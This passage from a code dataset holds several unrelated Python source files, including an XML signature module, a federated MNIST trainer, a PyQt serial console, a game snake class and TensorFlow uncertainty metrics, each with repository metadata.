str(base64.b64encode(digest.digest()), 'utf-8')\n else:\n result = tree.xpath(\"//*[@wsu:Id='\" + key[1:] + \"']\",\n namespaces=tree.nsmap)\n if len(result) == 1:\n xmlstring = str(etree.tostring(result[0]), 'utf-8')\n digest = calculate_digest(xmlstring, exclusive, comments)\n digest_value = str(base64.b64encode(digest.digest()), 'utf-8')\n\n if digest_value != value:\n log.error('{0}: Digest values differ.'.format(key))\n return False\n\n try:\n if check_revocation_status(certificate_data):\n # Certificate used to sign this message is on revocation list\n return False\n except ValueError:\n log.error(\"Unsupported certificate format.\")\n return False\n\n # Generate certificate object from data found on x509data\n filetype = OpenSSL.crypto.FILETYPE_ASN1\n try:\n cert = OpenSSL.crypto.load_certificate(filetype, certificate_data)\n except OpenSSL.crypto.Error as e:\n log.exception(e)\n return False\n\n # Verify signature\n try:\n OpenSSL.crypto.verify(\n cert, signaturevalue, bytes(canonicalizated_info, 'utf-8'), 'sha1'\n )\n except OpenSSL.crypto.Error as e:\n log.exception(e)\n return False\n\n return True\n\n\ndef sign(xml_string, private_key, certificate, xml_declaration_=False):\n \"\"\"\n Signs xml message with dsig algorithm.\n\n @type xml_string: string\n @param xml_string: Xml text to sign\n @type private_key: string\n @param private_key: Name of the file containing private key.\n @type certificate: string\n @param certificate: Name of the file containing X509v3 certificate.\n @type xml_declaration_: boolean\n @param xml_declaration: Add xml declaration to xml string.\n @rtype: string\n @return: Xml string signed with private key.\n @raise IOError: In case of failing open private key or certificate file.\n @raise ValueError: In case of private key being in unsupported format.\n \"\"\"\n # Test that xml can be parsed.\n try:\n e = etree.fromstring(xml_string)\n except etree.XMLSyntaxError:\n raise RuntimeError(\"Malformatted xml string\")\n xml_string = str(etree.tostring(e), 'utf-8')\n signature = generate_xml_signature(xml_string, private_key, certificate)\n e.append(signature)\n return etree.tostring(e,\n xml_declaration=xml_declaration_,\n encoding=\"UTF-8\",\n pretty_print=False)\n\n\ndef get_certificate(xml_string):\n \"\"\"\n Gets certificate from xml_string.\n\n @type xml_string: bytes\n @param xml_string: XML-string containing certificate data.\n @rtype: string\n @return: Base64 encoded Certificate data or\n None if certificate is not found.\n \"\"\"\n WSSE = (\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss\"\n \"-wssecurity-secext-1.0.xsd\")\n DSIG = \"http://www.w3.org/2000/09/xmldsig#\"\n\n tree = etree.fromstring(xml_string)\n keyinfo = tree.xpath(\"//ds:KeyInfo\",\n namespaces={'ds': DSIG})\n if len(keyinfo) > 0:\n reference = keyinfo[0].xpath(\"//wsse:Reference\",\n namespaces={'wsse': WSSE})\n if len(reference) > 0:\n # Certificate is in BinarySecurityToken element.\n bst = tree.xpath(\"//wsse:BinarySecurityToken\",\n namespaces=tree.nsmap)\n if len(bst) > 0:\n return bst[0].text\n else:\n # Certificate is in X509Certificate element\n certificate = keyinfo[0].xpath(\"//ds:X509Certificate\",\n namespaces={'ds': DSIG})\n if len(certificate) > 0:\n return certificate[0].text\n return None\n\n\ndef canonicalizate_message(xml_string, exclusive_=False, comments_=False):\n \"\"\" Canonicalizates given xml_string\n\n @type xml_string: string\n @param xml_string: Xml string to canonicalizate\n @type exclusive_: boolean\n @param exclusive_: Use exclusive 
canonicalization\n @type comments_: boolean\n @param comments_: Use with_comments mode in canonicalization.\n @rtype: string\n @return: Canonicalizated version of xml_string\n \"\"\"\n file_object = StringIO(xml_string) # Generate file like object from string\n tree = etree.parse(file_object)\n file_object = BytesIO() # Empty file object to write canonicalizated xml\n tree.write_c14n(file_object, with_comments=comments_, exclusive=exclusive_)\n message = str(file_object.getvalue(), 'utf-8')\n return message\n\n\ndef calculate_digest(xml_string, exclusive_=False, comments_=False):\n \"\"\"\n Calculates message digest for signing\n\n @type xml_string: string\n @param xml_string: Xml text\n @rtype: L{Digest}\n @return: sha-1 digest of the message\n \"\"\"\n message = canonicalizate_message(xml_string, exclusive_, comments_)\n digest = hashlib.sha1(bytes(message, 'utf-8'))\n return digest\n\n\ndef calculate_signature_value(xml_string, private_key, exclusive_=False,\n comments_=False):\n \"\"\"\n Calculates rsa-sha1 signaturevalue for signed xml\n\n @type xml_string: bytes or string\n @param xml_string: Signed info element as a string.\n @type private_key: string\n @param private_key: Private RSA-key filename\n @type exclusive_: boolean\n @param exclusive_: Use exclusive canonicalization\n @type comments_: boolean\n @param comments_: Use with_comments-style canonicalization.\n @raise IOError: If the private key can't be read from file.\n @raise ValueError: If PyCrypto can't import RSA-key\n @rtype: string\n @return: Calculated signaturevalue as a raw string.\n \"\"\"\n log = logging.getLogger('bankws')\n canonicalizated_info = canonicalizate_message(xml_string,\n exclusive_,\n comments_)\n\n try:\n with open(private_key, 'rb') as f:\n content = f.read()\n except EnvironmentError as e:\n log.exception(e)\n raise IOError(\"Failed to open file {0}\".format(private_key))\n\n try:\n pkey = RSA.importKey(content)\n except ValueError as e:\n log.exception(e)\n raise\n\n info_digest = SHA.new(canonicalizated_info.encode('utf-8'))\n signer = PKCS1_v1_5.new(pkey)\n signaturevalue = signer.sign(info_digest)\n return signaturevalue\n\n\ndef generate_xml_signature(xml_string, private_key, X509certificate):\n \"\"\" Generates xml signature\n\n @type xml_string: String\n @param xml_string: String to sign\n @type X509certificate: string\n @param X509certificate: Certificate filename\n @type private_key: string\n @param private_key: RSA private key filename\n @raise IOError: In case of failing open private key or certificate file.\n @raise ValueError: In case of private key being in unsupported format.\n @rtype: L{lxml.etree._Element}\n @return: Signature element.\n \"\"\"\n log = logging.getLogger('bankws')\n log.info(\"Generating signature.\")\n # Canonicalization algorithms\n C14NWITHCOMMENTS = (\"http://www.w3.org/TR/2001/REC-xml-c14n-20010315\"\n \"#WithComments\")\n # Signature algorithms\n RSASHA1 = \"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"\n # Transform algorithms\n ENVELOPED = \"http://www.w3.org/2000/09/xmldsig#enveloped-signature\"\n # Digest algorithms\n SHA1 = \"http://www.w3.org/2000/09/xmldsig#sha1\"\n digest = calculate_digest(xml_string, comments_=True)\n info = \\\n SIGNEDINFO(\n CANONICALIZATIONMETHOD(Algorithm=C14NWITHCOMMENTS),\n SIGNATUREMETHOD(Algorithm=RSASHA1),\n REFERENCE(\n TRANSFORMS(\n TRANSFORM(Algorithm=ENVELOPED)\n ),\n DIGESTMETHOD(Algorithm=SHA1),\n DIGESTVALUE(str(base64.b64encode(digest.digest()), 'utf-8')),\n URI=\"\"\n ),\n )\n\n tree = etree.fromstring(xml_string)\n # 
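Everything in this module hinges on canonicalization producing byte-identical XML on the signing and verifying sides. A standalone sketch of the lxml c14n round-trip that canonicalizate_message wraps; note how attribute order and the empty element are normalized:

```python
from io import BytesIO, StringIO
from lxml import etree

xml = '<a z="1" b="2"><!-- note --><c/></a>'
tree = etree.parse(StringIO(xml))
out = BytesIO()
# Same call canonicalizate_message uses: attributes are sorted, the empty
# element is expanded, and comments are kept because with_comments=True.
tree.write_c14n(out, with_comments=True, exclusive=False)
print(out.getvalue().decode('utf-8'))
# -> <a b="2" z="1"><!-- note --><c></c></a>
```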
Append info to original xml string so info element gets correct\n # namespace declarations.\n tree.append(info)\n\n info_message = str(etree.tostring(info), 'utf-8')\n log.debug(\"Signature Info part: {0}\".format(info_message))\n signaturevalue = calculate_signature_value(info_message,\n private_key,\n comments_=True)\n\n try:\n with open(X509certificate, 'rb') as f:\n content = f.read()\n except EnvironmentError as e:\n log.exception(e)\n raise IOError(\"Failed to open file {0}\".format(X509certificate))\n\n signature = \\\n DOC(\n SIGNATUREVALUE(str(base64.b64encode(signaturevalue), 'utf-8')),\n KEYINFO(\n X509DATA(\n X509CERTIFICATE(str(base64.b64encode(content), 'utf8'))\n )\n )\n )\n\n signature.insert(0, info)\n return signature\n","sub_path":"bankws/signature.py","file_name":"signature.py","file_ext":"py","file_size_in_byte":13158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"594243113","text":"import os\nfrom datetime import datetime, timedelta\n\n\nclass Logging(object):\n '''\n logging class will help to create, write and print logs in different\n env.\n '''\n\n def __init__(self):\n self.debug = True\n try:\n if os.environ[\"ENV\"] == \"PROD\":\n self.debug = False\n except Exception as e:\n print(\"---- no env-type found [{}] ---- \".format(e))\n print(\"Running in default debug mode........\")\n\n def log(self, level, msg):\n # This contains the local timezone\n stamp = datetime.now()\n\n log = \"{}: {}: {}\".format(stamp.replace(microsecond=0) + timedelta(hours=3), level, msg)\n\n if self.debug or level == \"debug\":\n print(log)\n else:\n fileFormat = \"txt\"\n if level == \"error\":\n fileFormat = \"error\"\n\n date = stamp.date()\n filelocation = \"./log_utility/logs/log_{}.{}\".format(date, fileFormat)\n self.write_log(filelocation, log)\n return None\n\n def write_log(self, filelocation, log):\n try:\n with open(filelocation, \"a+\") as logging_file:\n logging_file.write(log + '\\n')\n except Exception as e:\n print(\"Error in logging [{}]\".format(e))\n\n return None","sub_path":"log_utility/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"326234241","text":"\"\"\"\nSnake class.\n\n\"\"\"\nfrom .vector import Vector\n\n\nclass Snake:\n def __init__(self, snake_id, name, x, y, length, color, direction, speed, acceleration):\n self.snake_id = snake_id\n self.name = name\n self.color = color\n self.speed = speed\n self.haste = False\n self.acceleration = acceleration\n self.direction = Vector(direction['x'], direction['y'])\n self.length = length\n self.add_length = 0\n\n self.vectors = list()\n\n head = Vector(x, y)\n self.vectors.append(head)\n self.vectors.append(head.subtract(self.direction.scale(self.length)))\n\n def update(self, direction, vectors):\n self.direction = Vector(direction['x'], direction['y'])\n self.vectors = list()\n for vector in vectors:\n self.vectors.append(Vector(vector['x'], vector['y']))\n","sub_path":"snakegame/client/views/game/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"652368301","text":"import torch\nfrom torch import nn\nfrom torch.nn.functional import relu, softmax\n\nfrom models.csBase import ClientBase, ServerBase\n\n\nclass MnistModel(nn.Module):\n def __init__(self):\n super(MnistModel, self).__init__()\n self.fc1 
= nn.Linear(784, 256)\n self.fc2 = nn.Linear(256, 10)\n\n def forward(self, x):\n x = self.fc1(x)\n x = relu(x)\n x = self.fc2(x)\n x = softmax(x, dim=1)\n return x\n\n\nclass Client(ClientBase):\n def __init__(self, client_name, train_loader, test_loader, start_epoch=0, checkpoint_path='./', device='cpu',\n best_acc=0):\n super(Client, self).__init__(client_name, train_loader, test_loader,\n start_epoch=start_epoch, checkpoint_path=checkpoint_path, device=device)\n self.model = MnistModel().to(device)\n # self.criterion = FocalLoss(2)\n self.criterion = nn.CrossEntropyLoss()\n self.optimizer = torch.optim.SGD(self.model.parameters(), lr=0.002, momentum=0.9)\n self.scheduler = torch.optim.lr_scheduler.ExponentialLR(self.optimizer, gamma=0.995, last_epoch=start_epoch - 1)\n self.best_acc = best_acc\n\n def run(self, n_epochs, save_last=False):\n train_loader = self.train_loader\n model = self.model\n criterion = self.criterion\n optimizer = self.optimizer\n scheduler = self.scheduler\n device = self.device\n\n total_loss = 0.0\n total_acc = 0.0\n\n model.train()\n\n for epoch in range(n_epochs):\n total = 0\n correct = 0\n running_loss = 0.0\n for batch_idx, (inputs, labels) in enumerate(train_loader):\n inputs = inputs.float().to(device)\n labels = labels.long().to(device)\n optimizer.zero_grad()\n outputs = model(inputs)\n _, pred = torch.max(outputs.data, 1)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n total += inputs.size(0)\n correct += torch.sum(pred == labels.data).item()\n running_loss += loss.item() * inputs.size(0)\n scheduler.step()\n epoch_loss = running_loss / total\n epoch_acc = correct / total\n\n print('{} Train | Epoch={:d} | Loss={:.4f} | Acc={:.4f}'.format(self.name, self.cur_epoch,\n epoch_loss, epoch_acc))\n\n self.cur_epoch += 1\n total_loss += epoch_loss\n total_acc += epoch_acc\n\n if save_last:\n self.save(suffix='_last')\n\n self.history['acc'].append(total_acc / n_epochs)\n self.history['loss'].append(total_loss / n_epochs)\n\n def test(self, save_best=False):\n test_loader = self.test_loader\n model = self.model\n criterion = self.criterion\n device = self.device\n\n total = 0\n correct = 0\n running_loss = 0.0\n\n model.eval()\n\n with torch.no_grad():\n for (inputs, labels) in test_loader:\n inputs = inputs.float().to(device)\n labels = labels.long().to(device)\n outputs = model(inputs)\n _, pred = torch.max(outputs.data, 1)\n loss = criterion(outputs, labels)\n total += inputs.size(0)\n correct += torch.sum(pred == labels.data).item()\n running_loss += loss.item() * inputs.size(0)\n\n total_loss = running_loss / total\n total_acc = correct / total\n\n print(\n '{} Test | Epoch={:d} | Loss={:.4f} | Acc={:.4f}'.format(self.name, self.cur_epoch - 1,\n total_loss, total_acc))\n\n if self.best_acc < total_acc:\n print('Achieve best accuracy: {}'.format(total_acc))\n self.best_acc = total_acc\n if save_best:\n self.save(suffix='_best')\n\n self.history['val_acc'].append(total_acc)\n self.history['val_loss'].append(total_loss)\n\n\nclass Server(ServerBase):\n def __init__(self, start_round=0, checkpoint_path='./', device='cpu'):\n super(Server, self).__init__(start_round=start_round, checkpoint_path=checkpoint_path,\n device=device)\n self.model = MnistModel().to(device)\n self.criterion = nn.CrossEntropyLoss()\n","sub_path":"models/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535102719","text":"from 
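Client and Server in the record above both wrap the same MnistModel, with the round logic hidden in csBase (not shown here). A hedged sketch of the federated-averaging step such a server could run; this is an assumption about the intent, not code from csBase:

```python
import torch

def federated_average(server_model, client_models):
    """FedAvg-style update: overwrite the server weights with the element-wise
    mean of the clients' weights. Equal client weighting is assumed."""
    client_states = [m.state_dict() for m in client_models]
    avg_state = {}
    for key in client_states[0]:
        avg_state[key] = torch.stack(
            [state[key].float() for state in client_states]).mean(dim=0)
    server_model.load_state_dict(avg_state)
    # Broadcast the averaged weights back to every client for the next round.
    for m in client_models:
        m.load_state_dict(server_model.state_dict())
```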
..render import RenderStep\nfrom ..color import get_color\nfrom ..utils import convert_position_to_point\n\nfrom collections import defaultdict\n\nclass RegionsStep(RenderStep):\n\n def __init__(self):\n super().__init__(\"borders\")\n\n def run(self, ctx, config):\n vor = ctx.data[config[\"input\"]]\n\n edge_systems = defaultdict(list)\n\n for region in vor.regions:\n vertices = region.vertices\n edges = [tuple(sorted([vertices[i], vertices[i+1]])) for i in range(-1, len(vertices)-1)]\n for edge in edges:\n edge_systems[edge].append(region.system)\n \n width = config[\"width\"]\n fill = get_color(ctx, config[\"fill\"])\n\n for (edge, systems) in edge_systems.items():\n\n owners = set()\n for system in systems:\n if system.starbase:\n owners.add(system.starbase.owner)\n else:\n owners.add(None)\n\n is_rim_controlled = len(systems) == 1 and None not in owners\n is_border = 1 < len(owners)\n\n if is_border or is_rim_controlled:\n points = [convert_position_to_point(ctx, v) for v in edge]\n ctx.draw.line(points, fill=fill, width=width)\n self._draw_circle(ctx.draw, points[0], fill, width/2)\n self._draw_circle(ctx.draw, points[1], fill, width/2)\n \n def _draw_circle(self, draw, center, fill, radius):\n points = (\n center[0] - radius + 1,\n center[1] - radius + 1,\n center[0] + radius - 1,\n center[1] + radius - 1\n )\n draw.ellipse(points, fill=fill)\n","sub_path":"stellaris/render/step/borders.py","file_name":"borders.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"273547482","text":"import tensorflow as tf\n\n\ndef compute_entropy(probability, axis, epsilon=1e-7):\n '''\n Args:\n probability:\n axis:\n epsilon:\n Returns:\n entropy\n '''\n is_zero = probability == 0\n has_zero = tf.math.reduce_any(is_zero)\n if has_zero:\n mask = epsilon * tf.ones_like(probability)\n masked_probability = tf.where(is_zero, mask, probability)\n log_probability = tf.math.log(masked_probability)\n else:\n log_probability = tf.math.log(probability)\n\n # entropy\n entropy = -tf.reduce_sum(probability * log_probability, axis=axis)\n return entropy\n\n\ndef compute_variation_ratio(prob_samples):\n '''\n Referenced 3.3.1 of following thesis.\n Y. Gal, \"Uncertainty in Deep Learning\", University of Cambridge (2016)\n\n Args:\n prob_samples: [num_samples, batch_size, num_classes]\n Returns:\n variation_ratio: [batch_size]\n '''\n num_samples = len(prob_samples)\n\n max_probs = tf.reduce_max(prob_samples, axis=2, keepdims=True)\n is_mode = tf.dtypes.cast(prob_samples == max_probs, prob_samples.dtype)\n\n # for multi-modal\n num_mode = tf.reduce_sum(is_mode, axis=2, keepdims=True)\n is_mode = is_mode / num_mode\n\n frequency = tf.reduce_sum(is_mode, axis=0)\n mode_frequency = tf.reduce_max(frequency, axis=1)\n return 1 - (mode_frequency / num_samples)\n\n\ndef compute_predictive_entropy(prob_samples, eps=1e-12):\n '''\n Referenced 3.3.1 of following thesis.\n Y. 
Gal, \"Uncertainty in Deep Learning\", University of Cambridge (2016)\n\n Args:\n prob_samples: [num_samples, batch_size, num_classes]\n Returns:\n predictive_entropy: [batch_size]\n '''\n pred_prob = tf.reduce_mean(prob_samples, axis=0)\n return compute_entropy(pred_prob, axis=1)\n\n\ndef compute_expected_entropy(prob_samples):\n '''\n Args:\n prob_samples: [num_samples, batch_size, num_classes]\n '''\n entropy_samples = compute_entropy(prob_samples, axis=2)\n return tf.reduce_mean(entropy_samples, axis=0)\n\n\ndef compute_mutual_information(prob_samples, eps=1e-12):\n '''\n Referenced 3.3.1 of following thesis.\n Y. Gal, \"Uncertainty in Deep Learning\", University of Cambridge (2016)\n\n Args:\n prob_samples: [num_samples, batch_size, num_classes]\n Returns:\n mutual_information: [batch_size, ]\n '''\n predictive_entropy = compute_predictive_entropy(prob_samples)\n expected_entropy = compute_expected_entropy(prob_samples)\n return predictive_entropy - expected_entropy\n","sub_path":"extended_tfp/uncertainty.py","file_name":"uncertainty.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"644313372","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'infoboxes'\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^add/box/$', views.add, name='add'),\n url(r'^add/tag/$', views.add_tag, name='add_tag'),\n url(r'^graph/$', views.GraphView.as_view(), name='graph'),\n]\n","sub_path":"infoboxes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"425590851","text":"\nimport socket\nimport threading\nfrom server import Server\nfrom client import Client\n\nUDP_IP = 5000\n\nmy_server = Server()\n\nthreading1 = threading.Thread(target=my_server.listen)\nthreading1.daemon = True\nthreading1.start()\n\n# User input\nwhile True:\n try:\n \tcommand = input(\"> \")\n except KeyboardInterrupt:\n \tprint(\"quitting\")\n \tquit()\n # Sends a message to every other server\n args = command.split()\n if args[0] == 'sendall':\n data = dict()\n data['msg_type'] = 'TEST'\n data['message'] = 'hi'\n my_server.sendall(data)\n elif args[0] == 'broadcast':\n \tmy_server.broadcastmessages()\n ### MESSAGING COMMANDS ###\n # postmessage \n elif args[0] == 'postmessage' or args[0] == 'pm':\n client_id = args[1]\n reputation = int(args[2])\n message = ' '.join(args[3:])\n my_server.postmessage(client_id, reputation, message)\n elif args[0] == 'dumpmessages':\n my_server.dumpmessages()\n ### VOTING COMMANDS ###\n # upvote/downvote \n elif args[0] == 'upvote':\n client_id = args[1]\n message_id = args[2]\n my_server.vote(client_id, message_id, 1)\n elif args[0] == 'downvote':\n client_id = args[1]\n message_id = args[2]\n my_server.vote(client_id, message_id, -1)\n elif args[0] == 'newclient':\n my_server.newclient()\n","sub_path":"anonrep.py","file_name":"anonrep.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"226377952","text":"import sys\r\nfrom PyQt5 import QtCore, QtWidgets, uic\r\nfrom serial import Serial, SerialException\r\n\r\nqtCreatorFile = r\"C:\\Users\\User\\My Files\\Shark-O-Meter\\GUI\\sharkogui.ui\"\r\n\r\nUi_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)\r\n\r\nclass SerialReceiver(QtCore.QThread):\r\n signal = 
QtCore.pyqtSignal('PyQt_PyObject')\r\n serial = None\r\n connected = False # set once the read loop is running; isConnected() reads this\r\n\r\n def __init__(self, port, baudrate, timeout):\r\n self.port = port\r\n self.baudrate = baudrate\r\n self.timeout = timeout\r\n QtCore.QThread.__init__(self)\r\n self.serial = Serial(self.port, baudrate=self.baudrate, timeout=self.timeout)\r\n\r\n def __del__(self):\r\n self.wait()\r\n\r\n def isConnected(self):\r\n return self.connected\r\n\r\n def run(self):\r\n try:\r\n while self.serial.is_open:\r\n self.connected = True\r\n ser_bytes = self.serial.readline()\r\n decoded_bytes = ser_bytes[0:len(ser_bytes)-2].decode(\"utf-8\")\r\n self.signal.emit(decoded_bytes)\r\n self.serial.close()\r\n self.connected = False\r\n except SerialException:\r\n self.connected = False\r\n print(\"Connection Lost.\")\r\n\r\nclass MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):\r\n path_to_file = None\r\n\r\n def __init__(self):\r\n QtWidgets.QMainWindow.__init__(self)\r\n Ui_MainWindow.__init__(self)\r\n self.setupUi(self)\r\n\r\n self.connectButton.clicked.connect(self.connectionToggle)\r\n\r\n self.consoleSendEdit.returnPressed.connect(self.consoleSend)\r\n self.consoleSendButton.clicked.connect(self.consoleSend)\r\n\r\n self.downloadButton.clicked.connect(self.saveFileSelect)\r\n self.serialThread = None\r\n\r\n # Slots\r\n\r\n def fromSerial(self, data):\r\n self.appendToConsole(data + \"\\n\")\r\n\r\n def connectionToggle(self):\r\n if self.serialThread and self.serialThread.serial.is_open:\r\n self.serialThread.serial.close()\r\n self.serialThread.quit()\r\n self.connectButton.setText(\"Connect\")\r\n else:\r\n if (self.serialPortEdit.text() == '' or self.serialBaudEdit.text() == ''):\r\n QtWidgets.QMessageBox.information(self, \"Needed Information\", \"Please supply a COM port number and baudrate.\")\r\n return\r\n\r\n try:\r\n self.connectButton.setText(\"Connecting...\")\r\n self.connectButton.setEnabled(False)\r\n self.serialThread = SerialReceiver(str(self.serialPortEdit.text()), int(self.serialBaudEdit.text()), 10)\r\n self.serialThread.signal.connect(self.fromSerial)\r\n self.serialThread.start()\r\n self.connectButton.setEnabled(True)\r\n self.connectButton.setText(\"Disconnect\")\r\n except SerialException:\r\n self.connectButton.setEnabled(True)\r\n self.connectButton.setText(\"Connect\")\r\n QtWidgets.QMessageBox.critical(self, \"Connection Error\", \"Unable to connect to device. 
Check physical connection, COM port, and baudrate.\")\r\n\r\n def consoleSend(self):\r\n self.toSerial(self.consoleSendEdit.text())\r\n self.appendToConsole(self.consoleSendEdit.text())\r\n self.consoleSendEdit.clear()\r\n\r\n def toSerial(self, text):\r\n # send the command over the serial link; pyserial's write() expects bytes\r\n if self.serialThread and self.serialThread.serial.is_open:\r\n self.serialThread.serial.write(text.encode(\"utf-8\"))\r\n\r\n def appendToConsole(self, text):\r\n if text:\r\n cursor = self.consoleRecieveEdit.textCursor()\r\n cursor.movePosition(cursor.End)\r\n cursor.insertText(str(text))\r\n self.consoleRecieveEdit.ensureCursorVisible()\r\n\r\n def saveFileSelect(self):\r\n # PyQt5's getSaveFileName returns a (filename, selected_filter) tuple\r\n self.path_to_file, _ = QtWidgets.QFileDialog.getSaveFileName(self, \"Save As\", \"data.csv\", filter=\"csv (*.csv)\")\r\n self.serialThread.serial.write(b\"!download\") # write() needs bytes, not str\r\n\r\nif __name__ == \"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n mainWindow = MainWindow()\r\n mainWindow.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"GUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"614692612","text":"import cv2 as cv\nimport numpy as np\n\nimagepath=\"/home/bobchen/annationdist/VOC/OriginalImages/MVI_7392_578.jpg\"\n\n\nimg=cv.imread(imagepath,1)\nimgn=np.array(img)\nprint(imgn.shape)\n# imgn[104,:]=(0,0,255)\n# imgn[:,169]=(0,0,255)\n#imgn[98:134,455:489]=(0,0,255)\nrates=(1920/871)\nimgn[int(98*rates):int(134*rates),int(455*rates):int(489*rates)]=(0,0,255)\ncv.imshow(\"showimage\",imgn)\ncv.waitKey(0)\ncv.destroyAllWindows()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"98063529","text":"# Use *** as the opening marker and **** as the closing marker, then check whether a document is well-formed\n\n\ndef load_file(file_name):\n res = None\n with open(file_name) as f:\n lines = f.readlines()\n # make sure the last line ends with a newline\n if lines[-1][-1] != '\\n':\n lines[-1] += '\\n'\n res = [line[:-1] for line in lines]\n return res\n\n\ndef check(lines):\n cnt = 0\n line_num = 0\n i = 0\n for line in lines:\n i += 1\n if cnt == 0 and line == '***':\n cnt = 1\n line_num = i\n elif cnt == 1 and line == '***':\n line_num = i\n print('error line num is ', line_num)\n return False\n elif cnt == 1 and line == '****':\n cnt = 0\n elif cnt == 0 and line == '****':\n line_num = i\n print('error line num is ', line_num)\n return False\n if cnt > 0:\n print('error line num is ', line_num)\n return False\n return True\n\n\nif __name__ == '__main__':\n lines = load_file('DA16-优秀代码收录-原创与少数整理.md')\n print(check(lines))\n\n\n","sub_path":"NO12_Useful_tool/pair_checker.py","file_name":"pair_checker.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"196154110","text":"nazwa = 'cośtam'\n\ndef odwroc_string(string):\n \"\"\"\n Reverses the given string.\n :param string: str\n :return: str\n \"\"\"\n odwrocony = string[::-1]\n return odwrocony\n # return string[::-1]\n\ndef main():\n print(odwroc_string('cos sie dzieje'))\n\n odwr_zdanie = odwroc_string('ala ma kota')\n print(odwr_zdanie)\n\n odwr_zdanie = odwr_zdanie.upper()\n print(odwr_zdanie)\n\nif __name__ == '__main__':\n main()\n","sub_path":"dzien4_5_6/dzien5/odwracanie.py","file_name":"odwracanie.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"387730097","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = 
val\n self.left, self.right = None, None\n\"\"\"\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: An integer\n \"\"\"\n def maxPathSum(self, root):\n self.max_sum = float('-inf')\n self.max_sum_helper(root)\n return self.max_sum\n\n def max_sum_helper(self, root):\n if root is None:\n return 0\n left = self.max_sum_helper(root.left)\n right = self.max_sum_helper(root.right)\n\n left = left if left > 0 else 0\n right = right if right > 0 else 0\n self.max_sum = max(self.max_sum, root.val + left + right)\n return root.val + max(left, right)\n","sub_path":"Python/094 Binary Tree Maximum Path Sum.py","file_name":"094 Binary Tree Maximum Path Sum.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"257988678","text":"# Copyright (C) 2014 by Alex Brandt \n#\n# etest is freely distributable under the terms of an MIT-style license.\n# See COPYING or http://www.opensource.org/licenses/mit-license.php.\n\nimport functools\nimport logging\nimport os\n\nfrom etest import ebuild\n\nlogger = logging.getLogger(__name__)\n\n\nclass Overlay(object):\n @property\n @functools.lru_cache(1)\n def directory(self):\n _ = os.getcwd()\n\n while _ != '/':\n if os.path.exists(os.path.join(_, 'metadata', 'layout.conf')):\n break\n\n _ = os.path.dirname(_)\n else:\n raise InvalidOverlayError('not in a valid ebuild repository directory')\n\n return _\n\n @property\n def ebuilds(self):\n for path, directories, files in os.walk(self.directory):\n if 'files' in directories:\n directories.remove('files')\n\n for _ in files:\n if _.endswith('.ebuild'):\n yield ebuild.Ebuild(os.path.relpath(os.path.join(path, _), self.directory), self)\n\n\nclass InvalidOverlayError(RuntimeError):\n pass\n","sub_path":"etest/overlay.py","file_name":"overlay.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"444287868","text":"\nfrom __future__ import division\nimport random\nimport time\nimport numpy as np\n\nclass NN():\n def __init__(self, layers):\n \n self.layers = layers\n self.L = len(layers) \n self.w = [np.random.randn(l2, l1 + 1) for l2, l1 in zip(layers[1:], layers[:-1])]\n \n def train(self, train_data, epochs, mini_batch_size, eta):\n \n # number of training data \n m = len(train_data)\n # cost\n cost = []\n for j in range(epochs):\n start_time = time.time()\n print('Epoch {0} begin...'.format(j + 1))\n # shuffle data before run\n random.shuffle(train_data)\n # divide data into mini batchs\n for k in range(0, m, mini_batch_size):\n mini_batch = train_data[k:k+mini_batch_size]\n m_batch = len(mini_batch)\n # calc gradient\n w_grad = [np.zeros(W.shape) for W in self.w]\n for x, y in mini_batch:\n grad = self.backprop(x, y)\n w_grad = [W_grad + g for W_grad, g in zip(w_grad, grad)]\n w_grad = [W_grad / m_batch for W_grad in w_grad]\n \n # check grad for first mini_batch in first epoch\n if j == 0 and k == 0 and not self.check_grad(mini_batch, w_grad):\n print('backprop fail!')\n return False\n \n # update w\n self.w = [W - eta * W_grad for W, W_grad in zip(self.w, w_grad)]\n \n # calc cost\n cost.append(self.cost(train_data))\n 